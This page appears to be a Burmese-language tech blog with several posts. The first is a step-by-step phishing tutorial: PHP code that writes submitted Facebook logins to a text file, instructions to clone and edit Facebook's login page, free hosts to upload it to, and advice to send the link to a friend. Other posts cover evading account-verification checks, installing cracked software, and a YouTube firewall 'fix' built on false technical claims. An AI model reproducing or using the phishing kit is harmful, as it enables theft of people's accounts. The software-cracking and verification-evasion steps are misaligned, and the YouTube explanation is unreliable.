Tampilkan postingan dengan label Hacking Google. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking Google. Tampilkan semua postingan

How to hack facebook accounts (Fake Page Method)

Posted by Unknown Minggu, 08 Desember 2013 0 komentar


-------

Facebook account ကိုဘယ်လို hack မလဲ.. 
ဒီနည်းလေးကို အရင်ကလည်း တင်ဖူးပါတယ်.
အောက်ကနေ မန့် ကျပါတယ်.. မကောင်းတဲ့နည်းတို့ ဘာတို့ ပေါ့.. 
ဒီ Page လေးက နည်းပညာ မျှဝေ တဲ့ Page ၁ ခု သက်သက်ပါ..
ဒါကြောင့် ခု တင် တဲ့ Post လေးကို မဖတ် သင့်ဖူးထင်တဲ့လူရှိရင်ကျော်ဖတ် ပေးဖို့ ကြိုပြောချင်ပါတယ်.

Facebook Account ကို လွယ်လွယ်နဲ့ Hack လို့ မရ ပါဘူး.. ဆိုတာကို ကျွန်တော် ပြောပြချင်ပါတယ်..

ဒါပေမယ့် ခု ပြောပြမယ့် နည်းလေး ကလည်း Beignner Level hacking နည်းပါ..
Programming နည်းနည်းပါမယ်.. Site management ပိုင်းနည်းနည်းပါမယ် 
Fake Login page နဲ့ ဝင်တဲ့နည်းလေးပါ.. ဒါကို Phishing hacking လို့ခေါ်ပါတယ်.
ဒီနည်းလေးက နည်းနည်း ခက်ပါတယ်.. ဒါလေး တတ်ရင် Beginner Level ပီးပိပေါ့ (ထင်တာပဲ )
အာ့ကြောင့် သိပ်နားမလည်ရင် မကြိုးစားသင့်ပါဘူးလို့

သူ့ ရဲ့ သဘော တရားကတော့ login page အတုကြီးပြပီး 
အဲ Page အတု မှာ ဖြည့်လိုက်တဲ့ Username နဲ့ Password ကို Program code ကနေ တဆင့်ရယူတဲ့နည်းလေးပါ.. 
ကျွန်တော် အရင်ကလည်း တင်ဖူးပါတယ် အဲတုန်းက သေချာမရှင်းပြ လိုက်ရလို့ ခု မှ ပြန် ရှင်းပြတာပါ ..
အဲတော့ ကာ... Facebook account ကိုယူဖို့ Facebook site ရဲ့ Database ကို Hack တာတို့ဘာတို့ မထင်လိုက်ပါနဲ့ 
ဒီနည်းလေးက Beginner Level hacking လေးပါ.. 

ဘယ်လိုသုံးရမလဲ ပါ ကျွန်တော်ပြောပြပေးပါ့မယ် . အဟီးXD
Page အတု လုပ်ပီးပီ ဆိုပါတော့ အဲ Page ကိုလည်း Hosting site ၁ ခုခုမှာတင်ပီးပီဆိုပါတော့
ပီးရင် ခင်ဗျားရဲ့ သူငယ်ချင်း ၁ယောက်ယောက်ကို အဲ Fake facebook login page link ကို copy ကူးပီးတော့
"ဟိတ်ကောင် ဒီမှာလည်း Facebook 1 ခုကွ ဘာကြီးလည်းမသိဘူးး ဝင်ကြည့်ပါလားဆိုပီး ပေးလိုက် "
သူ ဝင်လိုက် ရင် သူ့ Username နဲ့ Password ရပီပေါ့.. 
အနော့်ကိုလာလုပ်ရင် ဆဲမှာနော်... 

အဟမ်းး.. သဘော တရားကိုတော့သဘောပေါက်လောက်ပီထင်ပါတယ်.. 
ဘယ်လို လုပ်ရမလဲ ဆိုတာတော့ပြော ပြပေးပါတော့မယ်.. နည်းနည်းတော့ ရှုပ်ပါတယ်
hosting အကြောင်းနားလည်တဲ့လူဆိုရင်တော့ သိပ်မခက်ပါဘူး.. 
အနော် က Post ၁ ခုအတွင်းလုံလောက်အောင်ပြောရတဲ့ အတွက်.. အကုန်မပြောပြနိုင်တာ ခွင့်လွှတ်ပါ..

> ပထမဆုံး Notepad ဖွင့် ပီး အောက်က PHP Code တွေကို copy ကူးပီး Save လိုက်ပါ. 

Save တဲ့နေရာမှာ ကျွန်တော်နာမည်ပေးတဲ့အတိုင်းပဲ လိုက်ပေးပါ.. 
login.php ဆိုပီး Save လိုက်ပါ..( Ext က .php နော်.. .txt မဟုတ်ဘူးနော်..)

<?php
header (&#039;Location: https://www.facebook.com/login.php&#039;);
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

> ပီးတော့ www.fb.com ကိုသွား login page နော်.. 
ရောက်သွားရင်. Ctrl + S နဲ့ Web page ကို Save လိုက်ပါ..
File direction ကို ကိုယ်သတ်မှတ်ထားတဲ့နေရာကို ထားပါ အရေးကြီးတယ်နော်.. 
(အဲနေရာက ခုနက login.php ရှိတဲ့နေရာဖြစ်နေပါစေ) 
ဥပမာ - Desktop ပေါ်ပေါ့

> သတိပြုစရာက Web page ကို Save လိုက်ရင်.. 
Folder ၁ခု Web page ၁ ခု ထွက်လာပါလိမ့်မယ်.. 
အဲက Folder ကအရေးကြီးတယ်နော်.. 
အဲတာမပါရင် အတုကြီးမှန်းသိကုန်လိမ့်မယ်..

> ကဲ.. Save ထားတဲ့ web page ပေါ်မှာ Right-click ထောက် open with notepad လုပ်.. 
Notepad ပွင့်လာပီဆိုရင်တော့ Ctrl + F နဲ့ method=”post” ဆိုတာကိုရှာလိုက်ပါ 
အဲဒီရဲ့ဘေးမှာ 
https://www.facebook.com/login.php?login_attempt=1 
ဆိုတဲ့လင့်အစားကိုတော့ 
/login.php 
ဆိုပီးထည့်ပေးလိုက်ပါ ပီးရင်တော့ Save ပီးပိတ်လိုက်ပါ။
ဘယ်လိုဖြစ်သွားမလဲဆိုတော့ .. action=”/login.php” ဖြစ်သွားလိမ့်မယ်.. ( ဒီ အပိုင်းကအရေးကြီး ပါတယ်.. )

> ကဲ ဒီအဆင့်က File upload အဆင့်ဖြစ်ပါတယ်.. file upload ဖို့အတွက် Hosting ၁ ခုခုမှာ Register လုပ်ရပါမယ် . 
ဒီ အပိုင်းက ကျွမ်းကျင်သူများသာလုပ်သင့်ပါတယ်..
ဘာလို့လဲဆိုရင် ခုမှ စပီး ဘာညာလိုက်ဖတ်နေတဲ့လူ ဟာ hosting အကြောင်းသိချင်မှ လည်းသိပါလိမ့်မယ်.
သိပီးသားလူဆိုရင် ပို အဆင်ပြေပါတယ်... 
ခု န က ကျွန်တော် ပြောတဲ့ file 2 ခု Folder ၁ ခု ကို Free hosting မှာ တင်ပေးရပါမယ်..

Free hosting site တွေကတော့ 

http://www.000webhost.com/
http://www.freehostia.com/

ကိုသုံးစေချင်ပါတယ်.. ကျွန်တော်လည်း ၁ ခါ ၁ လေ သုံးနေကျမို့ပါ.. .. 

အော် အဲလို Hosting ပေါ်တင်ပီး သူငယ်ချင်းကို Link လိုက်ပေးလိုက်ရင်တော့ ဟိုဘက်ကသာ Login ပြန်ဝင်ခဲ့မယ်ဆိုရင် Txt file ၁ ခု တိုးလာမှာဖြစ်ပါတယ် .. 

နောက် ထပ် ၁ ခု ထပ်ရေးပေးပါ့မယ် Hosting ပေါ်တင်တဲ့နည်းပေါ့.. 
ခုလောလောဆယ် ဒီ Post ဟာ Hosting အကြောင်းနားလည်တဲ့လူ တွေ အတွက်ပေါ့ 
ကိုယ့်ဟာ ကိုယ် စမ်းကြည့်လည်းလွယ်ပါတယ် Register လုပ်ပီး File manager ကနေ Upload လုပ်ပေးရတာပါပဲ
ဘာမှ မခက်ပါဘူး

နောက်ပိုင်းမှ ပုံတွေနဲ့အသေးစိပ်ရှင်းပြပေးပ့ါမယ်.. 
Facebook က ပုံတွေ အများကြီးထည့်ဖို့ အဆင်မပြေလို့ပါ.. 
နားမလည်ရင် message ပို့ပီး အကူအညီတောင်းလို့ရပါတယ်နော် 



အားလုံးပဲ သူများဒုက္ခ ပေးနိုင်ပါစေလို့ ဆုတောင်းရင်းနဲ့

Than Toe Aung

Baca Selengkapnya ....

gmail မရှုံးအောင် Facebook အကောင့်သစ်ဖွင့်နည်း

Posted by Unknown Jumat, 16 Agustus 2013 0 komentar
ရေးပါများလို့ ဒီလိုပို့စ်မျိုးတွေကို
ညည်းငွေ့လာမှာကိုတောင် အားနာမိပါတယ်

မရေးလို့လည်း မဖြစ်ပြန်ပါဘူး ...

ဘာကြောင့်လဲဆိုတော့ လွန်ခဲ့တဲ့ ရက်အနည်းငယ်က
ကျွန်တော့်ရဲ့ Facebook Page မှာ Facebook အကောင့်အတွက်
အခက်အခဲရှိတဲ့ သူငယ်ချင်းတွေကို ကျွန်တော်ကိုယ်တိုင်ဖွင့်ပေးမယ့်အကြောင်း
Status ရေးပေးခဲ့ပါတယ် ...



အဲဒီလိုရေးခဲ့ပြီး သုံးရက်အတွင်း ကျွန်တော့်ရဲ့ email ထဲကို Facebook အကောင့်ဖွင့်ပေးဖို့
ရောက်လာတဲ့စာပေါင်း ၃၂၀ ကျော်ရှိသွားပါတယ် ..

တတ်နိုင်သလောက်တော့ ဖွင့်ပေးနေပါတယ် ...

တစ်ရက်ကိုမှ အကောင့်သုံးခုလောက်ပဲ ဖွင့်နိုင်ပါတယ် ..

Facebook အကောင့်သစ်ဖွင့်ရင်း Security Check မိလို့ ရှုံးသွားတဲ့ gmail တွေလည်း မနည်းမနောပါပဲ
အဲဒီတော့ ခက်ခက်ခဲခဲ အကျော်အခွတွေနဲ့ ဖွင့်ထားရတဲ့ gmail လေးမရှုံးအောင် နည်းလမ်းရှာရပါတယ်
အဲဒီမှာပဲ ဒီနည်းလေးက တော်တော် အသုံးဝင်တာတွေ့လိုက်ရပါတယ် ..

အချိန်တော့ နည်းနည်းကုန်တယ် ..
ဒါပေမယ့် gmail လုံးဝ မရှုံးတော့ပါဘူး

ဘယ်လိုလုပ်သလဲဆိုတော့ Facebook အကောင့်ဖွင့်ရင်း Security Check မိလို့ ရှုံးသွားမယ့် gmail နေရာမှာ
ထိုးကျွေးဖို့ အလွယ်တကူလည်းရ Facebook ကလည်း လက်ခံတဲ့ email တွေထဲမှာ yahoomail နဲ့ hushmail နှစ်မျိုးကို
သွားတွေ့ပါတယ် ..
yahoomail က အကောင့်သစ်ဖွင့်တဲ့နေရာမှာ တော်တော်လေး ကြာတဲ့အတွက် hushmail နဲ့ စမ်းကြည့်တော့
အဆင်တော်တော်ပြေတာတွေ့ရတဲ့အတွက် hushmail နဲ့ပဲ အသုံးပြုလိုက်ပါတယ် ..
အရင်ဆုံး www.hushmail.com ကိုသွားပြီး အကောင့်သစ်ဖွင့်ပါတယ် .. ( ဘာဖုန်းနံပါတ်မှမလိုပဲ Facebook ကလက်ခံတဲ့ hushmail တစ်ခုကို အလွယ်တကူ ရရှိပါတယ်)

အဲဒီ hushmail ကို သုံးပြီး Facebook အကောင့်သစ်တစ်ခုကို ဖွင့်ပါတယ် ..

Security Check မိလို့ Facebook အကောင့် အဆင်မပြေခဲ့ရင်လည်း နောက်ထပ် hushmail အသစ်တစ်ခုကို အလွယ်တကူ ဖွင့်ယူပြီး နောက်ထပ် Facebook အကောင့်သစ်တစ်ခု ထပ်ဖွင့်ပြန်ပါတယ် ..
အဲဒီလိုဖွင့်ရင်း Facebook အကောင့်တစ်ခု အောင်အောင်မြင်မြင် ရသွားပြီဆိုတော့မှ အဲဒီရလာတဲ့ Facebook အကောင့်ရဲ့  Primary Email နေရာမှာ hushmail အစား ကိုယ့်မှာကြိုတင်ပြီး လုပ်ထားတဲ့ gmail ကို အစားထိုးပေးလိုက်ပါတယ်

ဒီတော့ Facebook အကောင့် ဘယ်လောက်ပျက်သွား ပျက်သွား gmail အကောင့်ရှုံးမှာ လုံးဝပူစရာမလိုတော့ဘူးပေါ့ ..

ဒီအတိုင်းပြောပြရင် အရှည်ကြီးဖြစ်နေမှာမို့ အောက်မှာ ဗွီဒီယိုလေးနဲ့ လုပ်ပြထားပါတယ် ...





ကဲ .. အဆင်ပြေပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Facebook က ကျွန်တော့်ကို ဘယ်တော့မှ Phone နံပါတ် မတောင်းဘူး

Posted by Unknown Rabu, 10 Juli 2013 0 komentar
တကယ်ပါ ... ကိုယ့်အမည်ကို
ကိုယ်ဖော်တယ်ပဲထင်ထင်
ကြွားတယ်ပဲဆိုဆို ....

ကျွန်တော်က Facebook နဲ့
ပတ်သက်လာရင် သိပ်ကံကောင်း
တယ်လို့ ပြောရမယ်ထင်တယ် ..

ဘာကြောင့်လဲဆိုတော့
ကျွန်တော် Facebook အကောင့်ကို
ဘယ်အချိန်ပဲ အသစ်ဖွင့်ဖွင့်
ဖုန်းနံပါတ်အတောင်းခံရတယ်ဆိုတာ
လုံးဝမရှိခဲ့ပါဘူး ...

gmail အကောင့်ဖွင့်ရင်တောင် ငါးခုခြောက်ခုလောက်ဖွင့်မှ တစ်ခေါက်လောက်ပဲ ဖုန်းနံပါတ်နဲ့
Verification လုပ်ခိုင်းတာကို ကြုံရတာပါ ..


အဲဒီလို အကောင့်သစ်ဖွင့်တဲ့နည်းတွေကိုလည်း တစ်မျိုးပြီးတစ်မျိုး ရေးခဲ့ဖူးပါတယ် ..
ဗွီဒီယိုဖိုင်တွေတင်ပြီးတော့လည်း ရှင်းပြခဲ့ဖူးပါတယ် ... ဒါပေမယ့်
အချို့အနည်းငယ်အတွက်သာ အဆင်ပြေပေမယ့် ...
အဆင်မပြေတဲ့လူက ပိုများနေတာကို တွေ့ရပါတယ် ..
ကျွန်တော်လုပ်ပြတော့ အဆင်ပြေပြေနဲ့ ရသွားပြီး အခြားလူအချို့လုပ်တဲ့အခါကျတော့
ဖုန်းနံပါတ်တောင်းတာတို့ Security Code တောင်းတာတို့ စတဲ့ စိတ်ညစ်စရာအဆင့်တွေကို
ရောက်ရောက်သွားပြန်ပါတယ် ...

ဒါဟာဘာကြောင့်လဲဆိုတော့ .. ကျွန်တော့်ရဲ့ Browser မှာ History တွေ Cookies တွေ Track တွေ
သန့်ရှင်းနေလို့လို့ ကောက်ချက်ချရမှာဖြစ်ပါတယ် ..
တော်တော်များများက အင်တာနက်သုံးပြီဆိုရင် အဲဒီအသုံးပြုလိုက်တဲ့ Browser မှာ ကပ်ငြိကျန်ခဲ့တဲ့ History တွေ  Cookies တွေနဲ့ Track တွေကို သိပ်ဂရုမစိုက်ကြပါဘူး ..

ကျွန်တော်ကတော့ ကျွန်တော်သုံးနေတဲ့ Browser ရဲ့ သန့်ရှင်းရေးကို သိပ်ပြီး သတိထားပါတယ် ...
ကျွန်တော့်ရဲ့ Browser မှာ Ask.com လို Yahoo.com တို့ Tool Bar တွေ Search Engine တွေ
အပိုမရှိပါဘူး ...
အဲဒီလို Add on Tool bar တွေကိုတော့ Extension တို့ Add-ons တို့ကနေသွားပြီး remove တို့
Disable တို့လုပ်ပစ်နိုင်ပါတယ်
( အဲ .. Ask.com ဆိုတဲ့ Tool bar ကိုတော့ Uninstaller တစ်ခုခုသုံးပြီး Uninstall လုပ်မှ ဖျောက်နိုင်ပါမယ်)
နောက်ပြီး .. ဘယ်လောက်ပဲ အင်တာနက်သုံးသုံး ..
Browser ကို ပိတ်လိုက်တာနဲ့ History တွေလုံးဝကျန်မနေအောင်လို့
Browser ရဲ့ Options ကနေ Privacy ကိုဝင်ပြီး Never remember history လုပ်ထားပါတယ်

ဒါကိုလုပ်ဖို့ အရင်ဆုံး Browser ထဲက Recent histories တွေ အားလုံးကို အရင်ရှင်းရပါမယ်
Browser ရဲ့ ဘယ်ဖက်အပေါ်ဆုံးကိုနှိပ်လိုက်ပြီး ကျလာတဲ့ထဲက History ကနေ Clear Recent History ကိုနှိပ်ပါ





နောက်ထပ်ကျလာတဲ့ထဲမှာ everything ကိုရွေးပေးပြီး အောက်ဆုံးက Clear now ကိုနှိပ်ပေးလိုက်ပါ





ပြီးရင်တော့ Options ကိုသွားပြီး ပွင့်လာတဲ့ထဲက Privacy ဆိုတဲ့အောက်မှာ Never remember history ကိုရွေးပေးပြီး Ok ကိုနှိပ်ပေးလိုက်ရင် Browser ကို Restart ချရမယ့်အကြောင်း Message တက်လာပါမယ်
အဲဒါကိုလည်း Ok နှိပ်ပေးလိုက်ပါ ... Browser ဟာ ပိတ်ပြီး ပြန်ပွင့်လာပါလိမ့်မယ်





ဒါဆိုရင် .. Browser ကို ပိတ်လိုက်ပြီဆိုတာနဲ့ အဲဒီ Browser မှာရှိနေတဲ့ History တွေဟာ
အလိုလို Delete လုပ်ပြီးသား ဖြစ်သွားပါတယ် ...

အဲ .. အင်တာနက်မှာ ရှာဖွေတုန်းက appdata ဆိုတဲ့ထဲမှာ မှတ်သားထင်ကျန်နေခဲ့တဲ့
Cookies အချို့နဲ့ Track အချို့ကို ရှင်းပစ်ဖို့ကိုတော့ Wipe ဆိုတဲ့ ဆော့ဝဲလေးကို သုံးပါတယ်
Wipe ကို ဖွင့်လိုက်တာနဲ့ History တွေ Cache တွေ Cookies တွေနဲ့ Track ကို အရင်ဆုံး လိုက်ရှာပါတယ်
ရှာပြီးလို့ ငြိမ်သွားပြီဆိုရင်တော့ အောက်ကပုံအတိုင်း ပွင့်လာပါတယ် ..





အဲဒီထဲက Continue ကို နှိပ်ပေးလိုက်တဲ့အခါ .. ခဏအကြာမှာ အောက်ကပုံလေး ထပ်ပွင့်လာပါတယ်
Internet Download Manager ထဲက Track တွေကိုရော ရှင်းပစ်မယ်ဆိုရင် Yes ကို နှိပ်ပေးလိုက်ပါ
Resume လုပ်ပြီး ဆက်ဒေါင်းစရာကျန်နေသေးတယ်ဆိုရင်တော့ No ကို နှိပ်ပေးလိုက်ပါ ( အကောင်းဆုံးကတော့ Yes ကို နှိပ်တာ အရှင်းလင်းဆုံးပါပဲ .. )





အဲဒီလို Yes/No တစ်ခုခုနှိပ်ပေးလိုက်တာနဲ့ ခဏအကြာမှာ အောက်ကပုံအတိုင်း ရှင်းလင်းရေး လုပ်ငန်းတွေကို မြင်တွေ့ရမှာဖြစ်ပါတယ်





အားလုံးငြိမ်သွားပြီဆိုရင်တော့ Exit program ကို နှိပ်ပေးလိုက်ပါ ..
ဒါဆိုရင် Browser အားလုံးမှာ History , Cookies, Cache နဲ့ Track တွေ အားလုံးနီးပါးကို
ရှင်းလင်းပြီးသွားပြီဖြစ်ပါတယ် ..

Wipe ဆိုတဲ့ ဆော့ဝဲလေးရဲက နောက်ဆုံးဗားရှင်းကို အောက်ကလင့်မှာ ဒေါင်းယူနိုင်ပါတယ်








Setup ဖိုင်ကို Install လုပ်ပြီးရင် Crack ဆိုတဲ့ဖိုဒါထဲက wipe ဆိုတဲ့ exe ဖိုင်လေးကို ကော်ပီကူးယူပြီး
C >> Program files >> Wipe 2013 ဆိုတဲ့ဖိုဒါထဲကို Paste လုပ်လိုက်ပါ
Message Box တစ်ခုပွင့်လာတဲ့အခါ Replace ပါတာကို ရွေးပေးလိုက်ပါ
ဒါဆိုရင် Full Version ဖြစ်သွားပါပြီ
အဲဒီလို အပေါ်မှာပြောခဲ့တဲ့အတိုင်း ရှင်းလင်းရေးတွေ လုပ်ဆောင်ပြီးသွားပြီဆိုရင်တော့ Gmail အကောင့်အသစ်တစ်ခုလောက် ဖွင့်ကြည့်ပါ .. (ကောင်းတာက အားလုံးရှင်းပြီးရင် Restart ချလိုက်ဦး)
အဲဒီလိုဖွင့်တဲ့နေရာမှာ www.google.com.mm ကို မသုံးပါနဲ့ www.google.com ကနေပဲသွားပြီး အကောင့်သစ်ဖွင့်ပါ
Phone number အကွက်နဲ့ Location အကွက်တွေမှာ နိုင်ငံအမည်ကို United States ရွေးပေးပါ
(ဖုန်းနံပါတ်တော့ ထည့်စရာမလိုပါဘူး)
အဲဒီလိုဖွင့်ကြည့်ပါ ..
အကောင့်ငါးခုမှာ တစ်ခုလောက်ပဲ Verification တောင်းတာကြုံရပါလိမ့်မယ် ..
များသောအားဖြင့်တော့ Phone နံပါတ်မလိုပဲ အကောင့်တစ်ခု ရသွားတာက များပါတယ် ..
gmail အကောင့်ရသွားရင် Browser ကို ပိတ် ..
အပေါ်ဆုံးမှာပြောခဲ့သလိုပဲ Wipe ကိုသုံးပြီး ရှင်းလင်းရေးလုပ်
Facebook အကောင့်သစ်ကိုဖွင့် .. (နံမည်ကို အင်္ဂလိပ်နံမည်ပုံစံနဲ့ဖွင့်)
အဲဒီလိုလုပ်ကြည့်ပါ ..
အကောင့်သစ်တိုင်းနီးပါးအတွက် ဖုန်းနံပါတ် အတောင်းမခံရတော့တာကို တွေ့ရပါလိမ့်မယ်
နားလည်ထားဖို့က Facebook အကောင့်သစ်ဖွင့်တိုင်း Lock ကျတာပဲဖြစ်ဖြစ်
မသင်္ကာလို့ Phone Verification တောင်းတာပဲဖြစ်ဖြစ်
အကောင့်ရပြီးမှ Security Code တောင်းတာပဲဖြစ်ဖြစ် Browser ထဲက
History တွေ Cookies တွေ Cache တွေနဲ့ Track တွေကြောင့်သာ ဖြစ်လာရတယ်ဆိုတာကို
နားလည်ထားရင် ဘယ်လိုအကောင့်မျိုးမဆို အခက်အခဲမရှိနဲ့ ရရှိပိုင်ဆိုင်နိုင်မှာ ဖြစ်ပါတယ်
ကဲ .. အဆင်ပြေကြပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

MP3 သီချင်းတွေကို Google မှာ မရှာပဲ မြန်ဆန်တဲ့နှုန်းနဲ့ လိုချင်တာဒေါင်းကြမယ်

Posted by Unknown Selasa, 09 Juli 2013 0 komentar

post-image

အင်တာနက်မှာရှိတဲ့ MP3 သီးချင်းတွေကို
Search Engine တွေမှာ လှည့်ပတ်ပြီး
ရှာဖွေနေစရာမလိုပဲ ကွန်ပျူတာပေါ်ကနေပဲ
ကိုယ်လိုချင်တဲ့ အဆိုတော်ရဲ့နံမည်ကို
ရိုက်ထည့်ပြီး ရှာဖွေ ဒေါင်းယူနိုင်တဲ့
ဆော့ဝဲတစ်ခုနဲ့ မိတ်ဆက်ပေးချင်ပါတယ်

Freeware လေးမို့ Keygen ..Crack .. Patch
ဘာဆိုဘာမှမလိုပဲ ကိုယ်နှစ်သက်တဲ့
သီချင်းတွေကို MP3 ဖိုင်အဖြစ်နဲ့ Download
ရယူနိုင်မှာ ဖြစ်ပါတယ် ..





ကဲ .. လိုချင်တဲ့သူငယ်ချင်းများ သူ့ရဲ့ မူရင်းဝက်ဆိုဒ်ဖြစ်တဲ့

ဒီနေရာ ကိုသွားပြီး ဆော့ဝဲကို ဒေါင်းယူ Install လုပ်လိုက်ပါ

အကြောင်းကြောင်းကြောင့် မူရင်းဝက်ဆိုဒ်ကို ၀င်မရသူတွေအတွက်

အလွယ်တကူ ဒေါင်းယူနိုင်အောင် ဒီနေရာ မှာ တင်ပေးထားပါတယ်

ကိုယ်နှစ်သက်တဲ့နေရာက ဒေါင်းယူပြီး Install လုပ်လိုက်ပါ ..
Install လုပ်ပြီးလို့ ပရိုဂရမ်ကို Run လိုက်ရင် အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်






အဲဒီထဲက မြှားပြထားတဲ့အကွက်မှာ ကိုယ်လိုချင်တဲ့ သီချင်းရဲ့ အဆိုတော်နံမည်ကို
ရိုက်ထည့်ပြီး ညာဖက်က Search ဆိုတဲ့ Button လေးကို နှိပ်လိုက်ပါ ..

သက်ဆိုင်ရာအဆိုတော်ရဲ့ သီချင်းနံမည်တွေ ကျလာပါလိမ့်မယ် ...
အဲဒီထဲကမှ ကိုယ်ရချင်တဲ့သီချင်းကို download ဆိုတာလေးနှိပ်ပြီး ဒေါင်းယူလိုက်ရုံပါပဲ
MP3 သီချင်းတွေကို သာမာန်ထက် ၁၀ဆ လောက်ပိုမြန်အောင် ဒေါင်းယူနိုင်တာကိုလည်း
 တွေ့ရပါလိမ့်မယ်

အဆင်ပြေကြပါစေဗျာ
နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Youtube ကဗွီဒီယိုတွေကို အဆင်ပြေပြေနဲ့ ကြည့်နိုင်အောင်

Posted by Unknown Kamis, 04 Juli 2013 0 komentar
Youtube က ဗွီဒီယိုတွေဟာ
ဘယ်လောက်ပဲ ကွန်နက်ရှင်ကောင်းနေပါစေ
အနည်းနဲ့အများတော့ နှေးကွေးလေးလံတာ
သဘာဝပါပဲ ...

ဒါဟာဘာကြောင့်လဲဆိုတော့ ကမ္ဘာနဲ့ချီပြီး
လူကြိုက်များတဲ့ google လို youtube လို ၀က်ဆိုဒ်တွေမှာ
အကြိမ်ကြိမ်ရှာဖွေခြင်းခံထားရတဲ့ ဖိုင်တွေရဲ့
Temporary Cache တွေကို နောက်ထပ်ရှာဖွေသူတွေရဲ့
Streaming ထဲကို အတင်းသွပ်သွင်းပေးတာကြောင့်ဖြစ်ပါတယ်


ဒါဟာ တစ်ကယ်တော့ ရှာဖွေသူတွေအတွက် လျှင်မြန်တဲ့ Data
လက်ခံနိုင်မှုကို အထောက်အပံ့ဖြစ်စေဖို့နဲ့ သက်ဆိုင်ရာ ၀က်ဆိုဒ်ရဲ့
Banwidth လေလွင့်ခြင်းကို ကာကွယ်ပေးနိုင်တာဖြစ်ပေမယ့်
တစ်ကယ်တမ်း youtube မှာတင်ပဲ ဗွီဒီယိုဖိုင်ကို တိုက်ရိုက်ကြည့်နေတဲ့
User တွေအတွက်တော့ ပုံရိပ်နဲ့ အသံဖိုင်တွေရဲ့ စီးကြောင်း ( Streaming ) ကို
ဟန့်တားနှောက်ယှက်ရာ ရောက်စေပါတယ် ..

ဒါ့အပြင် ကိုယ်က Youtube မှာ ဗွီဒီယိုဖိုင်တစ်ဖိုင်ကို ဖွင့်လိုက်တဲ့အခါတိုင်း
အဲဒီ ဗွီဒီယိုဖိုင်ရဲ့ Temporary Cache တွေကို ကျွန်တော်တို့ရဲ့ Browser တွေကတစ်ဆင့်
Firewall ကို ဖြတ်ကျော်ပြီး ကျွန်တော်တို့ရဲ့ ကွန်ပျူတာတွေထဲကို အတင်းအကြပ် စီးဆင်းစေတာကြောင့်
Youtube မှာ ဗွီဒီယိုကြည့်တာများတဲ့ ကွန်ပျူတာတွေဟာ အခြားသောကွန်ပျူတာတွေနဲ့ နိုင်းယှဉ်လိုက်ရင်
Data သိမ်းဆည်းနိုင်မှုပမာဏ လျော့နည်းတာ .. Browser တွေမှာ Crash ဖြစ်ခြင်းရာခိုင်နှုန်းများတာနဲ့
အခြားသောကွန်ပျူတာတွေထက် နှေးကွေးလေးလံတာမျိုးတွေ ဖြစ်နေလေ့ရှိပါတယ်

ဒါကြောင့်လည်း ဘယ်လောက်ပဲ အင်တာနက်ကွန်နက်ရှင်ကောင်းနေပါစေ
youtube ကဗွီဒီယိုဖိုင်တွေကို ဒေါင်းမယူပဲ တိုက်ရိုက်ကြည့်တဲ့အခါ အနည်းနဲ့အများဆိုသလို
Loading စောင့်ပေးရတာ လှိုင်းဂယက်ထတာ ထစ်အထစ်အ ဖြစ်တာမျိုးတွေ ကြုံနေရတာဖြစ်ပါတယ်

အဲဒီတော့ ကျွန်တော်အပေါ်မှာပြောခဲ့တဲ့ Temporary Cache တွေကို ကျွန်တော်တို့ရဲ့ ကွန်ပျူတာတွေထဲ
အတင်းအဓမ္မ စီးဆင်းခြင်းကို ပိတ်ပင်ထားနိုင်မယ်ဆိုရင် Youtube ကဗွီဒီယိုတွေကို သာမာန်ထက်ပိုပြီး
အဆင်ပြေပြေနဲ့ ကြည့်ရှုနိုင်မှာဖြစ်တဲ့အပြင် Temporary Cache တွေကြောင့် ကွန်ပျူတာကို
လေးလံစေတာမျိုးလည်း သက်သာသွားစေမှာဖြစ်ပါတယ် ..

ကဲ .. အဲဒီလို youtube ကိုဖွင့်လိုက်တိုင်း သက်ဆိုင်ရာ ဗွီဒီယိုဖိုင်တွေရဲ့ Temporary Cache တွေကို
ပိတ်ပင်ထားဖို့ အောက်က အဆင့်တွေကို လုပ်ဆောင်ပေးနိုင်ပါတယ် ...

အရင်ဆုံး သက်ဆိုင်ရာဝင်းဒိုးရဲ့ Command Prompt ကို Administrator အဖြစ် ဖွင့်ရပါမယ်
Windows xp နဲ့ Windows 7 မှာတော့ Start ကနေ cmd ကို ရှာပြီးဖွင့်နိုင်သလို Start >> Run ဆိုပြီး
Run Box ထဲမှာ CMD လို့ ရိုက်ထည့်ပြီး Command Prompt ကို ဖွင့်နိုင်ပါတယ်
Windows 8 မှတော့ ဘယ်ဖက်အောက်ဒေါင်နားမှာ Right Click နှိပ်ပြီး ပွင့်လာတဲ့ထဲက
Command Prompt ( Admin ) ကိုရွေးပြီး ဖွင့်ရပါမယ် ..





ကဲ .. Command Prompt ဖွင့်လာပြီဆိုပါတော့ ...
အောက်ကကုဒ်တွေကို ကော်ပီကူးယူပါ

netsh advfirewall firewall add rule name="YouTubeHack" dir=in action=block remoteip=173.194.55.0/24,206.111.0.0/16 enable=yes

ပြီးရင် Command Prompt ပေါ်မှာ Right Click နှိပ်ပြီး ပွင့်လာတဲ့ထဲ Paste ကိုနှိပ်ပေးလိုက်ရင် ကော်ပီကူးယူထားတဲ့ကုဒ်တွေ ရောက်လာပါမယ်




Enter ကို နှိပ်လိုက်ပါ ..
အဆင်ပြေတယ်ဆိုရင် Ok ဆိုတဲ့ စာလုံးလေး ပေါ်လာပါမယ် ..





ပြီးရင်တော့ အဲဒီ Command Prompt ကို ပိတ်လိုက်ပါ
ဒါဆိုရင် Youtube ကဗွီဒီယိုတွေကို ဖွင့်ကြည့်တဲ့အခါ အရင်ကထက် ပိုမိုအဆင်ချောလာတာကို တွေ့ရပါလိမ့်မယ်

တစ်ကယ်လို့ အခုလို Firewall မှာ youtube ရဲ့ Temporary Cache တွေကို ပိတ်ထားလိုက်တာဟာ
